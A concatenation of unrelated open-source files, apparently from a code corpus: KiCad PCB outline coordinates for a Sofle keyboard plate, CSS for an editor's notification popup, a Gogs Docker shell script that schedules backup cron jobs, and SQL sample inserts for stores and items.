(xy 120.935131 108.238939) (xy 120.945939 108.239631) (xy 120.970993 108.236315) (xy 120.984182 108.236111) (xy 120.992487 108.251579) (xy 120.99529 108.25576) (xy 120.997296 108.260368) (xy 121.030048 108.307617) (xy 121.062032 108.355334) (xy 121.065584 108.358882) (xy 121.068454 108.363022) (xy 121.074285 108.369793) (xy 121.107396 108.407709) (xy 121.119354 108.418966) (xy 121.129569 108.431825) (xy 121.135829 108.438203) (xy 121.139584 108.441976) (xy 121.162445 108.460846) (xy 121.183246 108.481965) (xy 121.190148 108.487641) (xy 121.24981 108.536014) (xy 121.272282 108.550851) (xy 121.292964 108.568094) (xy 121.324279 108.585181) (xy 121.354046 108.604835) (xy 121.378964 108.615022) (xy 121.402608 108.627923) (xy 121.410857 108.63136) (xy 121.486392 108.662215) (xy 121.491471 108.663731) (xy 121.496189 108.666122) (xy 121.551247 108.681573) (xy 121.60608 108.697939) (xy 121.611349 108.698439) (xy 121.616449 108.69987) (xy 121.625258 108.701372) (xy 121.738074 108.719796) (xy 121.764746 108.721509) (xy 121.791056 108.726194) (xy 121.799969 108.726832) (xy 121.971476 108.737911) (xy 121.97453 108.737809) (xy 121.977548 108.738274) (xy 121.986474 108.738703) (xy 122.032621 108.740598) (xy 122.03564 108.740427) (xy 122.038641 108.740817) (xy 122.047574 108.741037) (xy 122.217261 108.744035) (xy 122.228414 108.74314) (xy 122.239576 108.744041) (xy 122.248509 108.743824) (xy 122.385062 108.739567) (xy 122.411437 108.736148) (xy 122.438041 108.735711) (xy 122.446911 108.73463) (xy 122.528933 108.724061) (xy 122.556814 108.717654) (xy 122.585222 108.714236) (xy 122.617544 108.703697) (xy 122.650666 108.696085) (xy 122.674785 108.685275) (xy 122.685822 108.682303) (xy 122.691011 108.679742) (xy 122.703974 108.675515) (xy 122.712134 108.671872) (xy 122.724909 108.66606) (xy 122.749817 108.651645) (xy 122.764647 108.644998) (xy 122.772073 108.639732) (xy 122.797828 108.62702) (xy 122.814663 108.614117) (xy 122.833016 108.603495) (xy 122.864115 108.576213) (xy 122.896964 108.551035) (xy 122.910972 108.535107) (xy 122.926912 108.521123) (xy 122.952134 108.488302) (xy 122.979451 108.45724) (xy 122.990089 108.438911) (xy 123.003021 108.422083) (xy 123.02139 108.384982) (xy 123.042151 108.349212) (xy 123.045804 108.341057) (xy 123.075818 108.272782) (xy 123.086552 108.24) (xy 123.12893 108.24) (xy 123.1327 108.23963) (xy 123.136468 108.239955) (xy 123.194821 108.233539) (xy 123.25324 108.227811) (xy 123.25686 108.226718) (xy 123.260626 108.226304) (xy 123.316666 108.208661) (xy 123.372815 108.191709) (xy 123.376155 108.189933) (xy 123.379767 108.188796) (xy 123.40806 108.173322) (xy 123.435125 108.183112) (xy 123.493125 108.204251) (xy 123.494561 108.20461) (xy 123.494639 108.204638) (xy 123.494729 108.204652) (xy 123.501794 108.206417) (xy 123.677064 108.248899) (xy 123.682627 108.249683) (xy 123.68796 108.251439) (xy 123.744412 108.258394) (xy 123.800747 108.266337) (xy 123.806353 108.266026) (xy 123.811929 108.266713) (xy 123.820863 108.266872) (xy 124.063884 108.269516) (xy 124.093058 108.266975) (xy 124.122347 108.267479) (xy 124.131249 108.266697) (xy 124.319485 108.248852) (xy 124.323422 108.248086) (xy 124.316825 108.253705) (xy 124.273703 108.288875) (xy 124.269323 108.29417) (xy 124.264088 108.298629) (xy 124.22953 108.342272) (xy 124.194085 108.385117) (xy 124.190818 108.391159) (xy 124.186547 108.396553) (xy 124.161118 108.446087) (xy 124.134677 108.49499) (xy 124.132646 108.501552) (xy 124.129504 108.507672) (xy 124.11419 108.561172) (xy 124.097741 108.61431) (xy 124.097022 108.621149) (xy 124.095131 108.627756) (xy 124.090499 108.683211) (xy 124.084685 108.738532) (xy 124.085308 108.745373) (xy 124.084735 108.752228) (xy 124.084927 108.761162) (xy 124.105659 109.491412) (xy 124.105678 109.491563) (xy 124.105798 109.495793) (xy 124.114428 109.740643) (xy 124.114445 109.740767) (xy 124.114437 109.74089) (xy 124.114817 109.749818) (xy 124.125683 109.968798) (xy 124.125891 109.9702) (xy 124.125829 109.971615) (xy 124.126374 109.980534) (xy 124.138455 110.158055) (xy 124.139495 110.164275) (xy 124.139431 110.17058) (xy 124.140275 110.179476) (xy 124.15255 110.299945) (xy 124.15792 110.326532) (xy 124.160317 110.35356) (xy 124.162034 110.36233) (xy 124.170977 110.406411) (xy 124.179662 110.434694) (xy 124.185389 110.463721) (xy 124.197952 110.494258) (xy 124.207642 110.525815) (xy 124.221654 110.551871) (xy 124.232911 110.579234) (xy 124.251165 110.60675) (xy 124.2668 110.635823) (xy 124.285602 110.658656) (xy 124.301962 110.683317) (xy 124.307654 110.690206) (xy 124.389828 110.78827) (xy 124.40477 110.802922) (xy 124.411088 110.810979) (xy 123.992019 111.984107) (xy 123.992 111.984001) (xy 123.977964 111.933825) (xy 123.965556 111.883189) (xy 123.962533 111.87478) (xy 123.867517 111.616101) (xy 123.860325 111.601203) (xy 123.855343 111.585425) (xy 123.833221 111.545058) (xy 123.813215 111.503616) (xy 123.803267 111.4904) (xy 123.795315 111.475889) (xy 123.790225 111.468545) (xy 123.658631 111.281472) (xy 123.621793 111.23868) (xy 123.585719 111.195155) (xy 123.579328 111.188909) (xy 123.564362 111.174483) (xy 123.562864 111.173298) (xy 123.561617 111.171853) (xy 123.513889 111.134554) (xy 123.466403 111.096988) (xy 123.464706 111.096118) (xy 123.4632 111.094941) (xy 123.455622 111.090205) (xy 123.293113 110.9902) (xy 123.272781 110.980281) (xy 123.253848 110.967908) (xy 123.216774 110.952956) (xy 123.180854 110.935431) (xy 123.158993 110.929652) (xy 123.138009 110.921189) (xy 123.129417 110.918732) (xy 122.916971 110.859559) (xy 122.861604 110.849832) (xy 122.806394 110.839017) (xy 122.797493 110.838226) (xy 122.557063 110.818533) (xy 122.51152 110.819262) (xy 122.465992 110.817575) (xy 122.457077 110.81818) (xy 122.285688 110.831) (xy 122.285 110.26622) (xy 122.279085 110.206647) (xy 122.273664 110.147076) (xy 122.272919 110.144543) (xy 122.272659 110.141925) (xy 122.255303 110.084691) (xy 122.238398 110.027252) (xy 122.237177 110.024916) (xy 122.236412 110.022394) (xy 122.208232 109.969551) (xy 122.180529 109.91656) (xy 122.17888 109.914509) (xy 122.177638 109.91218) (xy 122.139767 109.865861) (xy 122.102263 109.819215) (xy 122.10024 109.817518) (xy 122.098575 109.815481) (xy 122.052488 109.777449) (xy 122.006579 109.738927) (xy 122.004267 109.737656) (xy 122.002236 109.73598) (xy 121.949606 109.707606) (xy 121.897123 109.678753) (xy 121.894608 109.677955) (xy 121.892291 109.676706) (xy 121.835124 109.659086) (xy 121.778063 109.640986) (xy 121.775445 109.640692) (xy 121.772926 109.639916) (xy 121.713447 109.633738) (xy 121.653936 109.627062) (xy 121.64884 109.627027) (xy 121.648689 109.627011) (xy 121.648542 109.627025) (xy 121.645 109.627) (xy 121.051488 109.627) (xy 120.989817 109.633047) (xy 120.928032 109.63902) (xy 120.927611 109.639147) (xy 120.927178 109.639189) (xy 120.868259 109.656978) (xy 120.808408 109.674959) (xy 120.808018 109.675166) (xy 120.807603 109.675291) (xy 120.753159 109.704239) (xy 120.698043 109.733449) (xy 120.697706 109.733723) (xy 120.697317 109.73393) (xy 120.649339 109.77306) (xy 120.60114 109.812261) (xy 120.600858 109.812601) (xy 120.600522 109.812875) (xy 120.561496 109.86005) (xy 120.521391 109.908395) (xy 120.521181 109.908782) (xy 120.520904 109.909117) (xy 120.491772 109.962996) (xy 120.461833 110.018188) (xy 120.461702 110.018609) (xy 120.461496 110.01899) (xy 120.443215 110.078047) (xy 120.424736 110.137458) (xy 120.42469 110.13789) (xy 120.42456 110.13831) (xy 120.418134 110.199453) (xy 120.41151 110.261661) (xy 120.411509 110.262485) (xy 120.411504 110.262532) (xy 120.411509 110.262584) (xy 120.411498 110.270598) (xy 120.415302 110.947344) (xy 120.384422 110.935284) (xy 120.341805 110.916162) (xy 120.333314 110.913376) (xy 120.284524 110.897744) (xy 120.238862 110.887901) (xy 120.193741 110.875813) (xy 120.184915 110.874416) (xy 120.07407 110.857659) (xy 120.050746 110.856438) (xy 120.027749 110.852374) (xy 120.018834 110.851747) (xy 119.846092 110.840813) (xy 119.838338 110.841081) (xy 119.830646 110.840022) (xy 119.821714 110.839736) (xy 119.606861 110.834346) (xy 119.603464 110.834593) (xy 119.600081 110.834212) (xy 119.591145 110.834145) (xy 119.353969 110.834021) (xy 119.351786 110.834234) (xy 119.349594 110.834033) (xy 119.340658 110.834153) (xy 119.100947 110.839014) (xy 119.098162 110.839344) (xy 119.095356 110.839151) (xy 119.086425 110.839473) (xy 118.863966 110.84904) (xy 118.858115 110.849869) (xy 118.85221 110.849654) (xy 118.843295 110.850264) (xy 118.657877 110.864259) (xy 118.641807 110.867069) (xy 118.625491 110.867533) (xy 118.616634 110.868721) (xy 118.488042 110.886864) (xy 118.454183 110.895075) (xy 118.419732 110.900326) (xy 118.411087 110.902589) (xy 118.379832 110.911003) (xy 118.365396 110.916448) (xy 118.350321 110.919714) (xy 118.307069 110.93845) (xy 118.262964 110.955087) (xy 118.249865 110.96323) (xy 118.235707 110.969363) (xy 118.227924 110.973753) (xy 118.05434 111.073254) (xy 118.03572 111.086497) (xy 118.015605 111.097331) (xy 117.98494 111.122614) (xy 117.952553 111.145649) (xy 117.936864 111.162252) (xy 117.919232 111.17679) (xy 117.91297 111.183165) (xy 117.837529 111.261029) (xy 117.835731 111.254919) (xy 117.83469 111.252927) (xy 117.834042 111.250782) (xy 117.805757 111.197585) (xy 117.777862 111.144227) (xy 117.776459 111.142482) (xy 117.775403 111.140496) (xy 117.737328 111.093813) (xy 117.699596 111.046882) (xy 117.697874 111.045437) (xy 117.696458 111.043701) (xy 117.650129 111.005374) (xy 117.603912 110.966594) (xy 117.601942 110.965511) (xy 117.600216 110.964083) (xy 117.547301 110.935472) (xy 117.494456 110.90642) (xy 117.492313 110.90574) (xy 117.490343 110.904675) (xy 117.432828 110.886871) (xy 117.375396 110.868653) (xy 117.373168 110.868403) (xy 117.371023 110.867739) (xy 117.311156 110.861447) (xy 117.251269 110.854729) (xy 117.246954 110.854699) (xy 117.246801 110.854683) (xy 117.246648 110.854697) (xy 117.242333 110.854667) (xy 116.692 110.854667) (xy 116.632062 110.860544) (xy 116.572076 110.866003) (xy 116.569921 110.866637) (xy 116.56769 110.866856) (xy 116.510109 110.884241) (xy 116.452252 110.901269) (xy 116.45026 110.90231) (xy 116.448115 110.902958) (xy 116.439127 110.907737) (xy 116.388667 110.888185) (xy 116.386335 110.887535) (xy 116.384167 110.886461) (xy 116.326148 110.870753) (xy 116.26835 110.854637) (xy 116.265942 110.854453) (xy 116.263602 110.853819) (xy 116.254779 110.852399) (xy 116.018928 110.816103) (xy 115.961192 110.812927) (xy 115.903485 110.808912) (xy 115.894554 110.809227) (xy 115.656882 110.819273) (xy 115.596982 110.827713) (xy 115.536872 110.835821) (xy 115.533339 110.836681) (xy 115.533198 110.836701) (xy 115.53306 110.836749) (xy 115.528189 110.837935) (xy 115.307075 110.893403) (xy 115.295718 110.897465) (xy 115.283871 110.89969) (xy 115.236995 110.918471) (xy 115.189467 110.935472) (xy 115.179127 110.941656) (xy 115.167925 110.946144) (xy 115.160023 110.950317) (xy 115.061473 111.003236) (xy 115.047492 110.993665) (xy 115.015109 110.97979) (xy 114.984024 110.963201) (xy 114.957844 110.955253) (xy 114.932682 110.944472) (xy 114.924145 110.941831) (xy 114.664665 110.863524) (xy 114.655824 110.861775) (xy 114.647405 110.858579) (xy 114.594633 110.849666) (xy 114.542135 110.839278) (xy 114.533132 110.839279) (xy 114.524244 110.837778) (xy 114.515325 110.83722) (xy 114.211649 110.820318) (xy 114.176526 110.821799) (xy 114.141411 110.820269) (xy 114.132491 110.820815) (xy 114.054581 110.826134) (xy 114.022422 110.831519) (xy 113.989898 110.833873) (xy 113.981101 110.835447) (xy 113.756988 110.877146) (xy 113.731206 110.884607) (xy 113.704747 110.889149) (xy 113.671349 110.901929) (xy 113.637005 110.911868) (xy 113.613164 110.924194) (xy 113.588091 110.933789) (xy 113.580125 110.937838) (xy 113.413013 111.024239) (xy 113.374547 111.049163) (xy 113.334841 111.072041) (xy 113.322237 111.083056) (xy 113.308187 111.092159) (xy 113.275305 111.124069) (xy 113.240788 111.154233) (xy 113.234711 111.160784) (xy 113.103255 111.304496) (xy 113.072079 111.346095) (xy 113.039559 111.386637) (xy 113.034727 111.394154) (xy 113.000877 111.447629) (xy 112.991212 111.429707) (xy 112.97095 111.405158) (xy 112.953128 111.378768) (xy 112.931288 111.357104) (xy 112.911703 111.333376) (xy 112.905325 111.327117) (xy 112.74572 111.172643) (xy 112.741671 111.169427) (xy 112.841344 111.030659) (xy 112.841393 111.030592) (xy 113.10648 110.661531) (xy 113.131744 110.617927) (xy 113.158645 110.575305) (xy 113.163011 110.563965) (xy 113.1691 110.553456) (xy 113.18541 110.505789) (xy 113.203524 110.45874) (xy 113.205604 110.446766) (xy 113.209536 110.435276) (xy 113.216278 110.385336) (xy 113.224907 110.335677) (xy 113.224622 110.323534) (xy 113.226248 110.311493) (xy 113.223161 110.261182) (xy 113.22198 110.210806) (xy 113.219342 110.198948) (xy 113.218598 110.186822) (xy 113.2058 110.138079) (xy 113.194855 110.088881) (xy 113.192889 110.084411) (xy 113.194826 110.085412) (xy 113.20315 110.088663) (xy 113.413465 110.169119) (xy 113.473163 110.185489) (xy 113.53286 110.201967) (xy 113.533868 110.202134) (xy 113.533925 110.20215) (xy 113.533991 110.202155) (xy 113.541676 110.203431) (xy 113.823562 110.248234) (xy 113.858072 110.250303) (xy 113.892271 110.25538) (xy 113.901199 110.255761) (xy 114.171509 110.265407) (xy 114.185942 110.26451) (xy 114.200348 110.265786) (xy 114.209283 110.265639) (xy 114.402732 110.261119) (xy 114.408847 110.260375) (xy 114.415002 110.260715) (xy 114.423927 110.260273) (xy 114.600409 110.25029) (xy 114.610792 110.248676) (xy 114.621302 110.248765) (xy 114.630197 110.247906) (xy 114.76201 110.234254) (xy 114.782069 110.230168) (xy 114.802497 110.22875) (xy 114.811298 110.227202) (xy 114.848245 110.22044) (xy 114.907672 110.203431) (xy 114.967376 110.186447) (xy 114.968279 110.186084) (xy 114.968329 110.18607) (xy 114.968381 110.186043) (xy 114.975668 110.183116) (xy 115.194941 110.093275) (xy 115.238356 110.070307) (xy 115.282685 110.049182) (xy 115.293464 110.041153) (xy 115.305349 110.034866) (xy 115.343464 110.003912) (xy 115.382858 109.974571) (xy 115.389427 109.968513) (xy 115.550788 109.817621) (xy 115.560458 109.806622) (xy 115.569649 109.798884) (xy 115.612186 109.853909) (xy 115.644592 109.88829) (xy 115.675312 109.924169) (xy 115.687346 109.933649) (xy 115.697859 109.944803) (xy 115.736325 109.972234) (xy 115.773429 110.001464) (xy 115.780988 110.00623) (xy 115.866295 110.059185) (xy 115.886398 110.06909) (xy 115.905101 110.081434) (xy 115.942295 110.096632) (xy 115.978339 110.114391) (xy 115.999982 110.120202) (xy 116.020727 110.128679) (xy 116.029307 110.131176) (xy 116.139391 110.162378) (xy 116.182701 110.17019) (xy 116.225501 110.180498) (xy 116.23436 110.18167) (xy 116.372515 110.198978) (xy 116.386703 110.19936) (xy 116.400674 110.201875) (xy 116.409586 110.20253) (xy 116.579115 110.213809) (xy 116.579269 110.213804) (xy 116.584036 110.214118) (xy 116.637272 110.217248) (xy 116.637273 110.217248) (xy 117.034885 110.24097) (xy 117.051751 110.240326) (xy 117.068532 110.24209) (xy 117.114038 110.237949) (xy 117.1597 110.236206) (xy 117.176115 110.2323) (xy 117.192924 110.23077) (xy 117.236773 110.217865) (xy 117.281213 110.207289) (xy 117.296554 110.20027) (xy 117.312748 110.195504) (xy 117.353237 110.174336) (xy 117.394795 110.155323) (xy 117.40849 110.145451) (xy 117.42344 110.137635) (xy 117.459051 110.109003) (xy 117.49612 110.082282) (xy 117.507628 110.069947) (xy 117.520785 110.059369) (xy 117.550169 110.02435) (xy 117.581328 109.990953) (xy 117.590221 109.976618) (xy 117.601073 109.963685) (xy 117.623096 109.923625) (xy 117.647174 109.884813) (xy 117.653113 109.869024) (xy 117.661247 109.854229) (xy 117.675065 109.810667) (xy 117.691151 109.767905) (xy 117.693912 109.751253) (xy 117.699014 109.735169) (xy 117.704108 109.689759) (xy 117.711582 109.644681) (xy 117.711056 109.627817) (xy 117.712938 109.611042) (xy 117.713 109.602106) (xy 117.713 109.176089) (xy 117.710991 109.155598) (xy 117.711681 109.13503) (xy 117.70491 109.093582) (xy 117.700811 109.051779) (xy 117.694862 109.032074) (xy 117.691543 109.011759) (xy 117.676848 108.97241) (xy 117.664709 108.932204) (xy 117.655045 108.914029) (xy 117.647844 108.894746) (xy 117.625791 108.859008) (xy 117.60607 108.821918) (xy 117.593059 108.805965) (xy 117.58225 108.788449) (xy 117.553671 108.757671) (xy 117.527125 108.725123) (xy 117.511264 108.712002) (xy 117.497258 108.696918) (xy 117.463243 108.672276) (xy 117.430883 108.645505) (xy 117.412779 108.635716) (xy 117.396107 108.623638) (xy 117.35795 108.60607) (xy 117.32101 108.586097) (xy 117.301348 108.580011) (xy 117.282648 108.571401) (xy 117.241809 108.56158) (xy 117.20169 108.549161) (xy 117.181221 108.54701) (xy 117.161204 108.542196) (xy 117.152345 108.541027) (xy 117.09763 108.534191) (xy 117.0962 108.500215) (xy 117.091647 108.241087) (xy 117.09162 108.23828) (xy 117.106397 108.239938) (xy 117.110712 108.239968) (xy 117.110865 108.239984) (xy 117.111018 108.23997) (xy 117.115333 108.24) (xy 117.221167 108.24) (xy 117.238458 108.238305) (xy 117.255807 108.239061) (xy 117.300484 108.232223) (xy 117.345477 108.227811) (xy 117.362104 108.222791) (xy 117.379274 108.220163) (xy 117.387918 108.217895) (xy 117.390656 108.217156) (xy 117.393893 108.218154) (xy 117.402661 108.219878) (xy 117.564855 108.250611) (xy 117.625839 108.256085) (xy 117.686828 108.261794) (xy 117.689145 108.261768) (xy 117.689261 108.261778) (xy 117.689385 108.261765) (xy 117.695763 108.261692) (xy 117.866954 108.258546) (xy 117.876275 108.257459) (xy 117.885648 108.257929) (xy 117.938246 108.250231) (xy 117.99102 108.244075) (xy 117.999947 108.2412) (xy 118.009237 108.23984) (xy 118.017895 108.237628) (xy 118.151856 108.202416) (xy 118.20153 108.184014) (xy 118.251725 108.1671) (xy 118.260019 108.162346) (xy 118.268983 108.159025) (xy 118.314121 108.131335) (xy 118.325434 108.12485) (xy 118.33594 108.130373) (xy 118.387148 108.158161) (xy 118.391224 108.159429) (xy 118.394996 108.161412) (xy 118.403298 108.16472) (xy 118.509952 108.206358) (xy 118.517755 108.208555) (xy 118.525068 108.21204) (xy 118.577809 108.225464) (xy 118.630183 108.240211) (xy 118.638257 108.24085) (xy 118.646114 108.24285) (xy 118.654957 108.244137) (xy 118.81349 108.266079) (xy 118.853207 108.26766) (xy 118.892715 108.272066) (xy 118.901651 108.272122) (xy 119.096336 108.271995) (xy 119.12534 108.269132) (xy 119.154486 108.26931) (xy 119.163379 108.26843) (xy 119.347168 108.248949) (xy 119.362228 108.245844) (xy 119.377569 108.244987) (xy 119.423282 108.233254) (xy 119.4695 108.223724) (xy 119.483658 108.217758) (xy 119.498553 108.213935) (xy 119.506929 108.21082) (xy 119.647148 108.157568) (xy 119.673916 108.144283) (xy 119.701926 108.133786) (xy 119.703605 108.132747) (xy 119.70926 108.136049) (xy 119.742572 108.158749) (xy 119.763081 108.167484) (xy 119.78232 108.178721) (xy 119.820403 108.191899) (xy 119.857489 108.207695) (xy 119.879301 108.21228) (xy 119.900359 108.219567) (xy 119.940272 108.225097) (xy 119.979723 108.23339) (xy 119.988613 108.234304) (xy 120.017649 108.237085) (xy 120.031104 108.237055) (xy 120.044402 108.239082) (xy 120.093459 108.236914) (xy 120.142554 108.236803) (xy 120.15574 108.234161) (xy 120.169186 108.233567) (xy 120.178023 108.232241) (xy 120.217037 108.22611) (xy 120.247177 108.218298) (xy 120.277952 108.213477) (xy 120.307503 108.202661) (xy 120.337948 108.19477) (xy 120.365997 108.181252) (xy 120.395249 108.170546) (xy 120.422131 108.154199) (xy 120.450468 108.140543) (xy 120.475366 108.121828) (xy 120.501973 108.105649) (xy 120.502979 108.104727) ) ) (filled_polygon (pts (xy 110.438459 109.951654) (xy 110.412912 109.98983) (xy 110.406521 110.00519) (xy 110.397997 110.019479) (xy 110.382575 110.062744) (xy 110.36493 110.105154) (xy 110.361644 110.121465) (xy 110.356059 110.137134) (xy 110.349336 110.182566) (xy 110.345613 110.201045) (xy 110.255725 110.074457) (xy 110.276873 110.06302) (xy 110.318841 110.042969) (xy 110.331703 110.033369) (xy 110.345827 110.025731) (xy 110.381657 109.996085) (xy 110.418939 109.968259) (xy 110.425503 109.962194) (xy 110.440622 109.948028) ) ) ) )
KiCad
4
GerardoNevarez/SofleKeyboard
Sofle_v1/Case/PCBBottom/SofleKeyboardBottomPlate.kicad_pcb
[ "MIT-0" ]
.mt-notification { position: fixed; z-index: 10000; overflow: hidden; border-radius: 5px; max-width: 350px; min-width: 280px; transition: all .2s ease; box-shadow: 0px 12px 0px 0px rgba(0, 0, 0, 0.0); backface-visibility: hidden; right: 15px; bottom: 15px; & > .notice-bg { background: #000; width: 0; height: 0; position: absolute; transition: all .8s ease,left .4s ease,top .4s ease; border-radius: 50%; z-index: 10; transform: translate(-50%, -50%); top: 50%; left: 50%; } & .content { z-index: 100; color: #fff; position: relative; & .icon-wrapper { width: 28px; height: 28px; border-radius: 50%; display: flex; justify-content: space-around; align-items: center; background: rgba(255, 255, 255, .2); } & .title { display: flex; align-items: center; padding: 5px 5px; & svg.icon { width: .85em; height: .85em; } & span { flex: 1; margin-left: 10px; } & .close { margin-right: 10px; opacity: 0; transition: all .2s ease; transform: scale(0); cursor: pointer; transform-origin: center; } } & .body { display: flex; align-items: center; font-size: 14px; padding-bottom: 5px; & .left-text { overflow: hidden; word-wrap: break-word; padding: 5px; box-sizing: border-box; width: 100%; } & .confirm { display: none; margin-left: 7px; width: 30px; height: 30px; cursor: pointer; } } } & .fluent-container { width: 100%; height: 100%; position: absolute; z-index: 40; display: block; top: 0px; left: 0px; } & .fluent { position: absolute; z-index: 50; display: block; backface-visibility: hidden; transform: translate(-50%, -50%); border-radius: 50%; transition: opacity 1s ease,width .4s ease,height .4s ease; background: rgba(255, 255, 255, .2); opacity: 0; filter: blur(22px); } &:hover .content .title .close { opacity: 1; transform: scale(1); } /* Notification style colors */ &.mt-primary { & > .notice-bg { background: var(--notificationPrimaryBg); } & > .content { color: var(--notificationPrimaryColor); } } &.mt-info { & > .notice-bg { background: var(--notificationInfoBg); } & > .content { color: var(--notificationInfoColor); } } &.mt-warn { & > .notice-bg { background: var(--notificationWarningBg); } & > .content { color: var(--notificationWarningColor); } } &.mt-error { & > .notice-bg { background: var(--notificationErrorBg); } & > .content { color: var(--notificationErrorColor); } } } .mt-notification.mt-confirm .content .body { & .left-text { width: calc(100% - 45px); } & .confirm { display: flex; } }
CSS
3
TankNee/marktext
src/renderer/services/notification/index.css
[ "MIT" ]
#!/usr/bin/env bash set -e BACKUP_PATH="/backup" # Make sure that required directories exist mkdir -p "${BACKUP_PATH}" mkdir -p "/etc/crontabs" chown git:git /backup chmod 2770 /backup # [string] BACKUP_INTERVAL Period expression # [string] BACKUP_RETENTION Period expression if [ -z "${BACKUP_INTERVAL}" ]; then echo "Backup disabled: BACKUP_INTERVAL has not been found" 1>&2 exit 1 fi if [ -z "${BACKUP_RETENTION}" ]; then echo "Backup retention period is not defined, default to 7 days" 1>&2 BACKUP_RETENTION='7d' fi # Parse BACKUP_INTERVAL environment variable and generate appropriate cron expression. Backup cron task will be run as scheduled. # Expected format: nu (n - number, u - unit) (eg. 3d means 3 days) # Supported units: h - hours, d - days, M - months parse_generate_cron_expression() { CRON_EXPR_MINUTES="*" CRON_EXPR_HOURS="*" CRON_EXPR_DAYS="*" CRON_EXPR_MONTHS="*" # shellcheck disable=SC2001 TIME_INTERVAL=$(echo "${BACKUP_INTERVAL}" | sed -e 's/[hdM]$//') # shellcheck disable=SC2001 TIME_UNIT=$(echo "${BACKUP_INTERVAL}" | sed -e 's/^[0-9]\+//') if [ "${TIME_UNIT}" = "h" ]; then if [ ! "${TIME_INTERVAL}" -le 23 ]; then echo "Parse error: Time unit 'h' (hour) cannot be greater than 23" 1>&2 exit 1 fi CRON_EXPR_MINUTES=0 CRON_EXPR_HOURS="*/${TIME_INTERVAL}" elif [ "${TIME_UNIT}" = "d" ]; then if [ ! "${TIME_INTERVAL}" -le 30 ]; then echo "Parse error: Time unit 'd' (day) cannot be greater than 30" 1>&2 exit 1 fi CRON_EXPR_MINUTES=0 CRON_EXPR_HOURS=0 CRON_EXPR_DAYS="*/${TIME_INTERVAL}" elif [ "${TIME_UNIT}" = "M" ]; then if [ ! "${TIME_INTERVAL}" -le 12 ]; then echo "Parse error: Time unit 'M' (month) cannot be greater than 12" 1>&2 exit 1 fi CRON_EXPR_MINUTES=0 CRON_EXPR_HOURS=0 CRON_EXPR_DAYS="1" CRON_EXPR_MONTHS="*/${TIME_INTERVAL}" else echo "Parse error: BACKUP_INTERVAL expression is invalid" 1>&2 exit 1 fi echo "${CRON_EXPR_MINUTES} ${CRON_EXPR_HOURS} ${CRON_EXPR_DAYS} ${CRON_EXPR_MONTHS} *" } # Parse BACKUP_RETENTION environment variable and generate appropriate find command expression. # Expected format: nu (n - number, u - unit) (eg. 3d means 3 days) # Supported units: m - minutes, d - days parse_generate_retention_expression() { FIND_TIME_EXPR='mtime' # shellcheck disable=SC2001 TIME_INTERVAL=$(echo "${BACKUP_RETENTION}" | sed -e 's/[mhdM]$//') # shellcheck disable=SC2001 TIME_UNIT=$(echo "${BACKUP_RETENTION}" | sed -e 's/^[0-9]\+//') if [ "${TIME_UNIT}" = "m" ]; then if [ "${TIME_INTERVAL}" -le 59 ]; then echo "Warning: Minimal retention is 60m. Value set to 60m" 1>&2 TIME_INTERVAL=60 fi FIND_TIME_EXPR="mmin" elif [ "${TIME_UNIT}" = "h" ]; then echo "Error: Unsupported expression - Try: eg. 120m for 2 hours." 1>&2 exit 1 elif [ "${TIME_UNIT}" = "d" ]; then FIND_TIME_EXPR="mtime" elif [ "${TIME_UNIT}" = "M" ]; then echo "Error: Unsupported expression - Try: eg. 60d for 2 months." 1>&2 exit 1 else echo "Parse error: BACKUP_RETENTION expression is invalid" 1>&2 exit 1 fi echo "${FIND_TIME_EXPR} +${TIME_INTERVAL:-7}" } add_backup_cronjob() { CRONTAB_USER="${1:-git}" CRONTAB_FILE="/etc/crontabs/${CRONTAB_USER}" CRONJOB_EXPRESSION="${2:-}" CRONJOB_EXECUTOR="${3:-}" CRONJOB_EXECUTOR_ARGUMENTS="${4:-}" CRONJOB_TASK="${CRONJOB_EXPRESSION} /bin/sh ${CRONJOB_EXECUTOR} ${CRONJOB_EXECUTOR_ARGUMENTS}" if [ -f "${CRONTAB_FILE}" ]; then CRONJOB_EXECUTOR_COUNT=$(grep -c "${CRONJOB_EXECUTOR}" "${CRONTAB_FILE}" || exit 0) if [ "${CRONJOB_EXECUTOR_COUNT}" != "0" ]; then echo "Cron job already exists for ${CRONJOB_EXECUTOR}. Updating existing." 1>&2 CRONJOB_TASK=$(echo "{CRONJOB_TASK}" | sed 's/\//\\\//g' ) CRONJOB_EXECUTOR=$(echo "{CRONJOB_EXECUTOR}" | sed 's/\//\\\//g' ) sed -i "/${CRONJOB_EXECUTOR}/c\\${CRONJOB_TASK}" "${CRONTAB_FILE}" return 0 fi fi # Finally append new line with cron task expression echo "${CRONJOB_TASK}" >>"${CRONTAB_FILE}" } CRONTAB_USER=$(awk -v val="${PUID}" -F ":" '$3==val{print $1}' /etc/passwd) # Up to this point, it was desirable that interpreter handles the command errors and halts execution upon any error. # From now, we handle the errors our self. set +e RETENTION_EXPRESSION="$(parse_generate_retention_expression)" if [ -z "${RETENTION_EXPRESSION}" ]; then echo "Couldn't generate backup retention expression. Aborting backup setup" 1>&2 exit 1 fi # Backup rotator cron will run every 5 minutes add_backup_cronjob "${CRONTAB_USER}" "*/5 * * * *" "/app/gogs/docker/runtime/backup-rotator.sh" "'${BACKUP_PATH}' '${RETENTION_EXPRESSION}'" add_backup_cronjob "${CRONTAB_USER}" "$(parse_generate_cron_expression)" "/app/gogs/docker/runtime/backup-job.sh" "'${BACKUP_PATH}'"
Shell
5
crazbot/gogs
docker/runtime/backup-init.sh
[ "MIT" ]
insert into location (id, country, city) values (1, 'Country X', 'City One'); insert into location (id, country, city) values (2, 'Country X', 'City Two'); insert into location (id, country, city) values (3, 'Country X', 'City Three'); insert into store (id, name, location_id, items_sold, active) values (1, 'Store One', 3, 130000, true); insert into store (id, name, location_id, items_sold, active) values (2, 'Store Two', 1, 170000, false); insert into item_type (id, name) values (1, 'Food'); insert into item_type (id, name) values (2, 'Furniture'); insert into item_type (id, name) values (3, 'Electronics'); insert into item (id, name, store_id, item_type_id, price, grade, color) values (1, 'Food Item One', 1, 1, 100, 'A', 'Color x'); insert into item (id, name, store_id, item_type_id, price, grade, color) values (2, 'Furniture Item One', 1, 2, 2500, 'B', 'Color y'); insert into item (id, name, store_id, item_type_id, price, grade, color) values (3, 'Food Item Two', 1, 1, 35, 'A', 'Color z'); insert into item (id, name, store_id, item_type_id, price, grade, color) values (5, 'Furniture Item Two', 2, 2, 1600, 'A', 'Color w'); insert into item (id, name, store_id, item_type_id, price, grade, color) values (6, 'Food Item Three', 2, 1, 5, 'B', 'Color a'); insert into item (id, name, store_id, item_type_id, price, grade, color) values (7, 'Electronics Item One', 2, 3, 999, 'B', 'Color b');
SQL
3
DBatOWL/tutorials
